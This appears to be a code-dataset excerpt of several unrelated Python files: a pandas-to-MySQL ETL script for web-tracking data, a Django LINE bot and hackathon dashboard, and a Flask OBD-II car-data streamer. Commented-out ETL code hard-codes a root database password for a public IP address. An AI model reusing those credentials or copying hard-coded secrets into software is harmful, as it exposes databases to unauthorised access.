result[['app_id','create_time','url','mark_page','mark_user','mark_uv','browser','borwser_version','system','system_version','ip','county','province','city','app_mobile','dr','load_data_time','update_time','ods_id']]\n\nelif input_table == 'ods_gd_points_web_pages' :\n #================================================================================================\n data = df1.explode('resource_list', ignore_index=True) \n data = data[~data['resource_list'].isna()]\n data[['resource_list_name','resource_list_method','resource_list_type','resource_list_duration','resource_list_decodedBodySize','resource_list_nextHopProtocol','resource_list_params','resource_list_result']] = pd.DataFrame(data['resource_list'].values.tolist()) \n\n # ######清洗resource_list\n # df1['resource_list_ods'] = df1['resource_list'] # 留作备份查看\n # #####将备份数据从json转为字符串形式\n # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: str(x).replace(':','='))\n # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: str(x).replace('\\'',''))\n # #####清洗resource_list为空的不用处理,最后直接添加\n # df2 = df1[df1['resource_list_ods'] != \"Document[[]]\"]\n # #####去除[]转换为json\n # df2['resource_list'] = df2['resource_list'].map(lambda x: str(x)[1:])\n # df2['resource_list'] = df2['resource_list'].map(lambda x: str(x)[:-1])\n # #####拆分清洗resource_list\n # obj = re.compile(r\"'params':.*?result\",re.S) ### 将参数的json单独拿出来存放到一个字段,之后处理\n # #将一个resource_list 拆分为多个\n # df3 = df2.drop('resource_list',axis=1).join(df2['resource_list'].str.split('}, {\\'name\\':',expand=True).stack().reset_index(level=1,drop=True).rename('resource_list')).reset_index(drop=True)\n # #取出resource_list_params并转为字符串并存放在单独字段中,避免影响后续处理\n # df3['resource_list_params'] = df3['resource_list'].map(lambda x: obj.findall(x))\n # df3['resource_list_params'] = df3['resource_list_params'].map(lambda x: str(x).replace('\\'','`').replace(', `result',''))\n # #resource_list去除resource_list_params并处理成json的样式\n # df3['resource_list'] = df3['resource_list'].map(lambda x: str(x)+\"}\")\n # df3['resource_list'] = df3['resource_list'].map(lambda x: re.sub(\", 'params':.*?result\",', \\'result',x))\n # df3['resource_list'] = df3['resource_list'].map(lambda x: \"{'name':\"+str(x).replace('}','').replace('{','').replace('\\'name\\':','')+\"}\")\n # #将处理好的dataframe整个转为json\n # df4 = (df3.to_json(orient = \"records\",force_ascii=False))\n # #将json文件中错误的地方纠正\n # df4 = df4.replace('\\'','\"').replace('\",\"resource_list_params\"',',\"resource_list_params\"').replace('resource_list\":\"{\"name\"','resource_list\":{\"name\"')\n # #2021-12-06resouece_list新增result处理\n # df4 = df4.replace('\"result\": True','\"result\": \"True\"').replace('\"result\": False','\"result\": \"False\"')\n # #####转换为字典\n # df5 = json.loads(df4)\n # #####转换为DtaFrame\n # df6 = pd.json_normalize(df5)\n\n # #================================================================================================\n # #####不放过任何一条数据\n # result = df1[df1['resource_list_ods'] == \"Document[[]]\"]\n # #####合并\n # \"\"\"\n # 先修改列名,然后再添加缺失的列\n # 最后合并,加载到mysql中\n # \"\"\"\n #改列名\n # df6 = data.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','resource_list_ods':'resource_list','resource_list.name':'resource_list_name','resource_list.method':'resource_list_methond','resource_list.type':'resource_list_type','resource_list.duration':'resource_list_duration','resource_list.decodedBodySize':'resource_list_decodebodysize','resource_list.nextHopProtocol':'resource_list_nexthotprotocol','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n df6 = data.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','resource_list_ods':'resource_list','resource_list_method':'resource_list_methond','resource_list_type':'resource_list_type','resource_list_duration':'resource_list_duration','resource_list_decodedBodySize':'resource_list_decodebodysize','resource_list_nextHopProtocol':'resource_list_nexthotprotocol','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n #提取数据\n # result = df6.drop(['data_v','resource_list.result'],axis=1)\n result = df6.drop(['data_v','resource_list_result'],axis=1)\n\n # #增加缺失列\n # result['resource_list_name'] = np.nan\n # result['resource_list_methond'] = np.nan\n # result['resource_list_type'] = np.nan\n # result['resource_list_duration'] = np.nan\n # result['resource_list_decodebodysize'] = np.nan\n # result['resource_list_nexthotprotocol'] = np.nan\n # result['resource_list_params'] = np.nan\n # # result['track_behaviorTag'] = np.nan\n #修改列名\n # result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n # #提取数据\n # result = result.drop(['data_v','resource_list_ods'],axis=1)\n # #合并数据\n # result = result.append(df6,ignore_index=False)\n #添加更新标识\n result['dr'] = 0\n result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n #脏数据处理\n result['resource_list_params'] = result['resource_list_params'].map(lambda x: \"[Doc[\"+str(x)+\"]\")\n result['resource_list'] = result['resource_list'].map(lambda x: \"[Doc[\"+str(x)+\"]\")\nelse :\n print(\"缺少输入参数!!!!!\")\n\n\n#In[]\nprint(\"LOAD DATA : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n#加载数据\nif input_table == 'ods_gd_points_web_statis' :\n to_dws(result,'ods_gd_points_web_statis')\nelif input_table == 'ods_gd_points_web_axios' :\n to_dws(result,'ods_gd_points_web_axios')\nelif input_table == 'ods_gd_points_web_pvuvip' :\n to_dws(result,'ods_gd_points_web_pvuvip')\nelif input_table == 'ods_gd_points_web_environ' :\n to_dws(result,'ods_gd_points_web_environ')\nelif input_table == 'ods_gd_points_web_pages' :\n to_dws(result,'ods_gd_points_web_pages')\nelse:\n print(\"没有加载数据的结果表\")\n\nprint('>>>>>>>>>>>>>>>>ETL Done!!!!!!')\n# df\n\nprint(\"END TIME : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ######===============================================以下为测试dataX导出的ongDB数据\n\n\n#In[]\n\n# import configparser,os,sys,pymysql,pandas as pd,json,numpy as np\n# from re import split\n# from sqlalchemy import create_engine\n\n# pymysql.install_as_MySQLdb()\n# cf = configparser.ConfigParser()\n# path = os.path.abspath(os.curdir)\n# confpath = path + \"/conf/config4.ini\"\n# cf.read(confpath) # 读取配置文件,如果写文件的绝对路径,就可以不用os模块\n# user = cf.get(\"Mysql\", \"user\") # 获取user对应的值\n# password = cf.get(\"Mysql\", \"password\") # 获取password对应的值\n# db_host = cf.get(\"Mysql\", \"host\") # 获取host对应的值\n# database = cf.get(\"Mysql\", \"database\") # 获取dbname对应的值\n# table_name = 'ods_gd_points_web_pages'\n# database = 'odsdb'\n# # input_file = '/data/ods'\n# input_file = 'luohw__73a9418d_0348_416d_867c_f2ed3db9b476'\n\n# # -*- coding: utf-8 -*-\n# class MysqlClient:\n# def __init__(self, db_host,database,user,password):\n# \"\"\"\n# create connection to hive server\n# \"\"\"\n# self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n# def query(self, sql):\n# \"\"\"\n# query\n# \"\"\"\n# cur = self.conn.cursor()\n# cur.execute(sql)\n# res = cur.fetchall()\n# columnDes = cur.description #获取连接对象的描述信息\n# columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n# data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n# cur.close()\n# return data\n# def close(self):\n# self.conn.close()\n\n# def to_dws(result,table):\n# engine = create_engine('mysql+mysqldb://'+user+':'+password+'@'+db_host+':'+'3306'+'/'+database+'?charset=utf8')\n# result.to_sql(name = table,con = engine,if_exists = 'append',index = False,index_label = False)\n\n# con = MysqlClient(db_host,database,user,password)\n\n\n\n# ####读取的文档\n# data = pd.read_csv(input_file, sep='\\t', header=None)\n# #####修改列名\n# data.columns=['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']\n# #####保留原始数据\n# data['resource_list_ods'] = data['resource_list']\n# # df = df[df['mark_user'] == 'xPhzc4RtZG1637562894972']\n# # df = df[df['mark_user'] == 'Td4p4Ta4Tx1634288215188']\n# # df = df[df['app_id'] == 'a2wQJt21634186115834']\n# # df = df[df['create_time'] == \"2021-11-23\"]\n# #####筛选\n# df = data[data['resource_list'] != \"[]\"]\n# ####拆除mongoDB文档类型的字段\n# df1 = df.drop('resource_list',axis=1).join(df['resource_list'].str.split(', Document{',expand=True).stack().reset_index(level=1,drop=True).rename('resource_list')).reset_index(drop=True)\n# #####手动替换字符,以达到json格式的数据\n# df1['resource_list'] = df1['resource_list'].str.replace('Document{', '')\n# # df1['resource_list'] = df1['resource_list'].str.replace('}}', '}}')\n# df1['resource_list'] = df1['resource_list'].str.replace('}}', '}')\n# df1['resource_list'] = df1['resource_list'].str.replace('\\[{', '{')\n# df1['resource_list'] = df1['resource_list'].str.replace('}\\]', '}')\n# df1['resource_list'] = df1['resource_list'].str.replace('{name=', '{\\'name\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', method=', '\\', \\'method\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', type=', '\\', \\'type\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', duration=', '\\', \\'duration\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', decodedBodySize=', '\\', \\'decodedBodySize\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', nextHopProtocol=', '\\', \\'nextHopProtocol\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', params=', '\\', \\'params\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace('}', '\\'}')\n# df1['resource_list'] = df1['resource_list'].str.replace('\\'}\\'}', '}\\'}')\n# # df1['resource_list'] = df1['resource_list'].str.replace('\\[\\]', '\\'')\n# # df1['resource_list'] = df1['resource_list'].str.replace('=\\'}', '=无}')\n# #####to_json\n# df2 = (df1.to_json(orient = \"records\",force_ascii=False))\n# #####清除脏字符\n# df2 = df2.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# #####转换为Json\n# df2 = json.loads(df2)\n# #####转换为DtaFrame\n# df3 = pd.json_normalize(df2)\n# ##==================================================================================\n# #####不放过任何一条数据\n# df4 = data[data['resource_list'] == \"[]\"]\n\n\n\n# # %%\n\n# #####合并\n# \"\"\"\n# 先修改列名,然后再添加缺失的列\n# 最后合并,加载到mysql中\n# \"\"\"\n# df3.columns=['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params']\n# result = df3[['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']]\n\n\n# df4['resource_list_name'] = np.nan\n# df4['resource_list_methond'] = np.nan\n# df4['resource_list_type'] = np.nan\n# df4['resource_list_duration'] = np.nan\n# df4['resource_list_decodebodysize'] = np.nan\n# df4['resource_list_nexthotprotocol'] = np.nan\n# df4['resource_list_params'] = np.nan\n# df5 = df4[['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']]\n\n# result = result.append(df5,ignore_index=False)\n\n\n# to_dws(result,table_name)\n\n# print('>>>ETL Done!!!!!!')\n\n\n\n#In[]\n\n\n\n\n\n\n# df1.to_csv('C:\\\\Users\\\\86133\\\\Desktop\\\\df1.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ######===============================================以下为测试python MongDB代码\n# # In[]:\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n\n# from json.decoder import JSONDecodeError\n# from numpy import maximum\n# import pymysql,pandas as pd,json\n\n\n# ##设置变量初始值##\n# user = 'root'\n# password = '000000'\n# db_host = '47.96.87.7'\n# database = 'ST'\n\n# ##mysql连接配置##\n# # -*- coding: utf-8 -*-\n# class MysqlClient:\n# def __init__(self, db_host,database,user,password):\n# \"\"\"\n# create connection to hive server\n# \"\"\"\n# self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n# def query(self, sql):\n# \"\"\"\n# query\n# \"\"\"\n# cur = self.conn.cursor()\n# cur.execute(sql)\n# res = cur.fetchall()\n# columnDes = cur.description #获取连接对象的描述信息\n# columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n# data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n# cur.close()\n# return data\n# def close(self):\n# self.conn.close()\n\n# con = MysqlClient(db_host,database,user,password)\n\n# deal=con.query(\"select @rowNo:=@rowNo+1 id,a.* from fang_detail a,(select @rowNo:=0) b limit 10\")\n\n\n\n# #In[]\n# ##basic_info record planning sale peitao trends\n# deal_basic_info = deal[['id','newest_id','basic_info']]\n# deal_basic_info[['id']] = deal_basic_info[['id']].astype('int')\n# deal_basic_info = (deal_basic_info.to_json(orient = \"records\",force_ascii=False))\n# deal_basic_info = deal_basic_info.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# # deal_basic_info\n# json_datas_basic_info = json.loads(deal_basic_info)\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n# result_basic_info\n\n\n# #In[]\n# deal_record = deal[['id','newest_id','record']]\n# deal_record[['id']] = deal_record[['id']].astype('int')\n# deal_record = (deal_record.to_json(orient = \"records\",force_ascii=False))\n# # deal_record\n# deal_record = deal_record.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# # deal_record\n# json_datas_record = json.loads(deal_record)\n# # json_datas\n# tmp_record = pd.json_normalize(json_datas_record)\n# # pd.json_normalize(json_datas,'record.楼盘纪事',['id','newest_id','record.分期信息'])\n# tmp_record.columns = ['id','newest_id','record_story','record_split']\n# # pd.json_normalize(tmp_record,'record_story',['id','newest_id','record_split'])\n# tmp_record_split = tmp_record[['id','newest_id','record_split']]\n\n\n# # %%\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n# import pymongo,pandas as pd,re\n# import datetime\n# import json\n# from bson import ObjectId\n\n# class JSONEncoder(json.JSONEncoder):\n# def default(self, o):\n# if isinstance(o,ObjectId):\n# return str(o)\n# return json.JSONEncoder.default(self,o)\n \n# myclient = pymongo.MongoClient(\"mongodb://10.122.144.202:27017/\")\n# mydb = myclient[\"performance-prod\"]\n# mycol = mydb[\"web_pages_a2wqjt21634186115834\"]\n# result = mycol.find_one({},{\"_id\": 1,\"resource_list\":1})\n# result1 =JSONEncoder().encode(result)\n\n\n\n# j = json.dumps(result1)\n# deal_basic_info = j.replace('_id','id')\n# json_datas_basic_info = json.loads(deal_basic_info)\n\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n\n# result_basic_info\n\n# # # %%\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n# import pymongo,pandas as pd,re\n# import datetime\n# import json\n# from bson import ObjectId\n\n# class JSONEncoder(json.JSONEncoder):\n# def default(self, o):\n# if isinstance(o,ObjectId):\n# return str(o)\n# return json.JSONEncoder.default(self,o)\n \n# myclient = pymongo.MongoClient(\"mongodb://10.122.144.202:27017/\")\n# mydb = myclient[\"performance-prod\"]\n# mycol = mydb[\"web_pages_a2wqjt21634186115834\"]\n# result = mycol.find_one({},{\"_id\": 0,\"resource_list\":1})\n# # result =JSONEncoder().encode(result)\n\n\n\n# j = json.dumps(result)\n# deal_basic_info = j.replace('{\"resource_list\": ','').replace('}]}','}]')\n# json_datas_basic_info = json.loads(deal_basic_info)\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n\n# result_basic_info\n\n\n\n\n# # %%\n# print(result)\n# print('type result===',type(result))\n# cal_index =0\n# for i in result:\n# cal_index = cal_index +1\n# if cal_index == 4: #先打个三个地区出来看看情况\n# break\n# #print('type i =',type(i))\n# # i.pop('_id') #不如这个key和value不去掉的话,会报ObjectId错误的问题,因为这个是MongoDB里面的类,json不认识,你的自定定义这个类来处理\n# j = json.dumps(i,ensure_ascii=False)\n# print(j)\n# # for x in mycol.find():\n# # print(x)\n\n\n","repo_name":"sanhengwangxiaoyu/EJU_Data_Project","sub_path":"03_DataAnalysis/01_code/python/CodeProjects/PythonProjects/opms/mycode/Git/ods/ods_gd_points_web.py","file_name":"ods_gd_points_web.py","file_ext":"py","file_size_in_byte":30998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71343411080","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport media\nimport fresh_tomatoes\n\n\n# Create the instance variables that will containa all the necessary properties to render movies\n\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy that comes to life',\n 'http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg'\n , 'https://www.youtube.com/watch?v=KYz2wyBy3kc')\n\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n 'http://fc02.deviantart.net/fs70/f/2010/014/b/c/Avatar_by_Eggar919.jpg'\n , 'https://www.youtube.com/watch?v=cRdxXPV9GNQ')\n\nrambo = media.Movie('Rambo', 'A soldier that suffers war',\n 'http://i2.cdnds.net/13/36/618x400/rambo.jpg',\n 'https://www.youtube.com/watch?v=OI0kenxkoNg')\n\n# Set those instance variables to the movies array\n\nmovies = [toy_story, avatar, rambo]\n\n# Pass the movies array to the open_movies_page method which will open the youtube url in a modal window\n\nfresh_tomatoes.open_movies_page(movies)\n\n\t\t\t","repo_name":"climboid/movie-trailer-website","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40067029714","text":"from base64 import b64encode\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom line.utilities import line_bot_api\nfrom django.views.generic import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom line.utilities import parser\nfrom line.einstein_vision import Predict\nfrom line.service import logger\nfrom linebot.models import (\n MessageEvent,\n TextSendMessage,\n FollowEvent\n)\n\n\nclass CallbackView(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n @staticmethod\n def events_parse(request):\n return parser.parse(\n request.body.decode('utf-8'),\n request.META['HTTP_X_LINE_SIGNATURE'])\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n @staticmethod\n def get_predict_result(result_lists):\n try:\n result_list = result_lists[0]\n probability = str(result_list.get('probability', ''))\n label = result_list.get('label')\n\n return f'{label}\\n{probability}'\n\n except Exception as ex:\n logger.info(ex)\n return 'この写真は判断できませんでした。'\n\n @staticmethod\n def get(_):\n return HttpResponse()\n\n def post(self, request):\n try:\n events = self.events_parse(request)\n except Exception as ex:\n logger.info(ex)\n return HttpResponseForbidden()\n\n for event in events:\n # line_id = event.source.sender_id\n\n if isinstance(event, FollowEvent):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(\n text='画像を送信してみましょう。'\n )\n )\n\n if isinstance(event, MessageEvent):\n\n if event.message.type == 'text':\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(\n text='画像を送信してください。'\n )\n )\n\n if event.message.type == 'image':\n message_content = line_bot_api.get_message_content(\n event.message.id)\n try:\n pr = Predict()\n result = pr.base64(\n b64encode(message_content.content))\n reply_text = self.get_predict_result(\n result.get('probabilities'))\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(\n text=reply_text\n )\n )\n # line_bot_api.push_message(\n # line_id,\n # TextSendMessage(\n # text='ありがとうございます。'\n # )\n # )\n\n except Exception as ex:\n logger.info(ex)\n return HttpResponse()\n\n return HttpResponse()\n","repo_name":"ShinjiroMoriya/line-einstein-vision","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8615811176","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom hackathons.models import Sponsorship, Hackathon, Lead\nfrom companies.models import Company\nfrom contacts.models import Contact\n\n\ndef page404(request):\n return render(request, \"404.html\", status=404)\n\n@login_required\ndef dashboard_index(request):\n if request.user.is_authenticated and request.user.current_hackathon:\n current_hackathon = request.user.current_hackathon\n else:\n messages.info(request, \"You need to select a default hackathon. This is configurable on your profile page. Until this is set, the most recent hackathon will be displayed.\")\n current_hackathon = Hackathon.latest()\n if not current_hackathon:\n return redirect(\"hackathons:index\")\n\n return redirect(\"dashboard:view\", h_pk=current_hackathon.pk)\n\n@login_required\ndef dashboard(request, h_pk):\n current_hackathon = get_object_or_404(Hackathon, pk=h_pk)\n\n sponsorships = Sponsorship.objects.filter(hackathon=current_hackathon).order_by(\"-updated_at\").select_related()\n money_raised = 0\n money_expected = 0\n money_possible = 0\n\n for sponsorship in sponsorships:\n if sponsorship.status == Sponsorship.PAID:\n money_raised += sponsorship.contribution\n elif sponsorship.status == Sponsorship.CONFIRMED:\n money_expected += sponsorship.contribution\n elif sponsorship.status == Sponsorship.RESPONDED:\n money_possible += sponsorship.contribution\n\n goal = current_hackathon.fundraising_goal\n money_raised_width = min(money_raised / goal * 100, goal)\n money_expected_width = max(0, min(money_expected / goal * 100, goal - money_raised))\n money_possible_width = max(0, min(money_possible / goal * 100, goal - money_raised - money_possible))\n\n money_expected += money_raised\n money_possible += money_expected\n \n sponsorship_chart = gen_sponsorship_chart(sponsorships, current_hackathon)\n\n leads = Lead.objects.filter(sponsorship__hackathon=current_hackathon).order_by(\"-updated_at\").select_related()\n lead_chart = gen_lead_chart(leads, current_hackathon)\n\n your_sponsorships = Sponsorship.objects.filter(hackathon=current_hackathon, organizer_contacts=request.user)\n\n return render(\n request,\n \"dashboard.html\",\n {\n \"current_hackathon\": current_hackathon,\n \"sponsorships\": sponsorships[:10],\n \"sponsorship_chart_data\": sponsorship_chart,\n \"leads\": leads[:10],\n \"lead_chart_data\": lead_chart,\n \"money_raised\": money_raised,\n \"money_expected\": money_expected,\n \"money_possible\": money_possible,\n \"money_raised_width\": money_raised_width,\n \"money_expected_width\": money_expected_width,\n \"money_possible_width\": money_possible_width,\n \"your_sponsorships\": your_sponsorships,\n },\n )\n\ndef gen_lead_chart(leads, hackathon):\n responded_count = 0\n contacted_count = 0\n ghosted_count = 0\n for l in leads:\n if l.status in [Lead.RESPONDED]:\n responded_count += 1\n elif l.status in [Lead.CONTACTED]:\n contacted_count += 1\n elif l.status in [Lead.GHOSTED]:\n ghosted_count += 1\n\n uncontacted_count = Contact.objects.exclude(leads__sponsorship__hackathon=hackathon).count()\n return [\n [\"Responded\", responded_count, \"responded\", \"green\"],\n [\"Contacted\", contacted_count, \"contacted\", \"orange\"],\n [\"Uncontacted\", uncontacted_count, \"uncontacted\", \"gray-dark\"],\n [\"Ghosted\", ghosted_count, \"dead\", \"pink\"],\n ]\n\ndef gen_sponsorship_chart(sponsorships, hackathon):\n confirmed_count = 0\n progress_count = 0\n dead_count = 0\n for sp in sponsorships:\n if sp.status in [Sponsorship.CONFIRMED, Sponsorship.PAID]:\n confirmed_count += 1\n elif sp.status in [Sponsorship.CONTACTED, Sponsorship.RESPONDED]:\n progress_count += 1\n elif sp.status in [Sponsorship.DENIED, Sponsorship.GHOSTED]:\n dead_count += 1\n\n uncontacted_count = Company.objects.exclude(sponsorships__hackathon=hackathon).count()\n return [\n [\"Confirmed\", confirmed_count, \"confirmed\", \"green\"],\n [\"In Progress\", progress_count, \"in_progress\", \"orange\"],\n [\"Uncontacted\", uncontacted_count, \"uncontacted\", \"gray-dark\"],\n [\"Dead\", dead_count, \"dead\", \"pink\"],\n ]","repo_name":"fuseumass/hackerforce","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"18020013595","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"ai_header_generator\",\n version=\"0.2.0\",\n packages=find_packages(include=['ai_header_generator', 'ai_header_generator.*']),\n install_requires=[\n \"openai\",'argparse','configparser','jsonpickle'\n ],\n entry_points={\n \"console_scripts\": [\n \"ai-meta-generator=cmd:main\",\n ],\n },\n include_package_data=True,\n package_data={\n '': ['*.json'],\n },\n url=\"https://github.com/GSejas/ai-generated-meta\",\n author=\"Jorge Sequeira\",\n author_email=\"jsequeira03@gmail.com\",\n maintainer=\"Jorge Sequeira\",\n maintainer_email=\"jsequeira03@gmail.com\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\"\n)","repo_name":"GSejas/ai-generated-meta","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35810099860","text":"from flask import Flask, Response\nimport obd\nfrom obd import OBD, OBDStatus, Unit, commands\nimport time, sys\n\nobd.logger.setLevel(obd.logging.DEBUG) # enables all debug information\n\napp = Flask(__name__)\nport = \"/dev/pts/1\"\n\n# Stream the data using Flask\n@app.route('/stream')\ndef stream_data():\n\n pid_mapping = {\n 'Run Time': commands.RUN_TIME,\n 'Fuel Type': commands.FUEL_TYPE,\n 'Fuel Pressure': commands.FUEL_PRESSURE,\n 'Throttle': commands.THROTTLE_POS,\n 'MAF': commands.MAF,\n 'RPM': commands.RPM,\n 'Speed': commands.SPEED,\n 'Ethanol %': commands.ETHANOL_PERCENT,\n 'Fuel Rate': commands.FUEL_RATE,\n 'Load %': commands.ENGINE_LOAD,\n 'Intake Pressure': commands.INTAKE_PRESSURE,\n 'Fuel Trim': [\n commands.SHORT_FUEL_TRIM_1,\n commands.SHORT_FUEL_TRIM_2,\n commands.SHORT_O2_TRIM_B1,\n commands.SHORT_O2_TRIM_B2,\n ]\n }\n try:\n\n # Connect to the OBD-II adapter\n connection = OBD(portstr=port, baudrate=9600, fast=False, timeout=1)\n if connection.status() == OBDStatus.NOT_CONNECTED:\n print(\"Failed to connect to the OBD-II adapter\")\n exit()\n if connection.status() == OBDStatus.CAR_CONNECTED:\n print(\"The OBD-II adapter has established a connection with the vehicle!\\nEntering execution mode...\")\n time.sleep(1) # Wait for the vehicle to respond\n except:\n print(\"Failed to connect to the OBD-II adapter\")\n exit()\n\n def generate_data():\n def run_command(connection, command):\n if connection.supports(command):\n return connection.query(command).value\n return None\n\n while True:\n try:\n # Get the data from the OBD-II adapter\n run_time = run_command(connection, pid_mapping['Run Time'])\n throttle = run_command(connection, pid_mapping['Throttle'])\n fuel_type = run_command(connection, pid_mapping['Fuel Type'])\n air_intake = run_command(connection, pid_mapping['MAF'])\n if not air_intake:\n air_intake = run_command(connection, pid_mapping['Intake Pressure'])\n rpm = run_command(connection, pid_mapping['RPM'])\n speed = run_command(connection, pid_mapping['Speed'])\n ethanol = run_command(connection, pid_mapping['Ethanol %'])\n fuel_pressure = run_command(connection, pid_mapping['Fuel Pressure'])\n\n fuel_efficiency = speed.magnitude * 1.040 / fuel_pressure.magnitude\n read = {\n 'time': time.strftime(\"%H:%M:%S\", time.localtime()),\n 'data': {\n 'Run Time': {\n \"magnitude\": run_time.magnitude,\n \"unit\": str(run_time.units),\n \"string\": str(run_time)\n },\n 'Fuel Type': str(fuel_type),\n 'Throttle': {\n \"magnitude\": throttle.magnitude,\n \"unit\": str(throttle.units),\n \"string\": str(throttle)\n },\n 'Air Intake': {\n \"magnitude\": air_intake.magnitude,\n \"unit\": str(air_intake.units),\n \"string\": str(air_intake)\n },\n 'RPM': {\n \"magnitude\": rpm.magnitude,\n \"unit\": str(rpm.units),\n \"string\": str(rpm)\n },\n 'Speed': {\n \"magnitude\": speed.magnitude,\n \"unit\": str(speed.units),\n \"string\": str(speed)\n },\n 'Ethanol %': ethanol.magnitude if ethanol else 'N/A',\n 'Fuel Efficiency': fuel_efficiency\n }\n }\n yield \"\"\n yield str(read)\n time.sleep(0.2) # 0.5-second interval\n except Exception as e:\n print(e)\n print(\"Error while reading data\")\n return\n return Response(generate_data(), mimetype='text/html')\n\nif __name__ == '__main__':\n # get port to use obd protocol\n if len(sys.argv) > 1:\n port = sys.argv[1]\n app.run(host='0.0.0.0')\n","repo_name":"RafaelN9/elm-data-read","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"9307162696","text":"import os\nimport time\n\nimport torch\n\nfrom argparse import ArgumentParser\nfrom src.training.models.GPT2SberAbstract import GPT2SberContext, 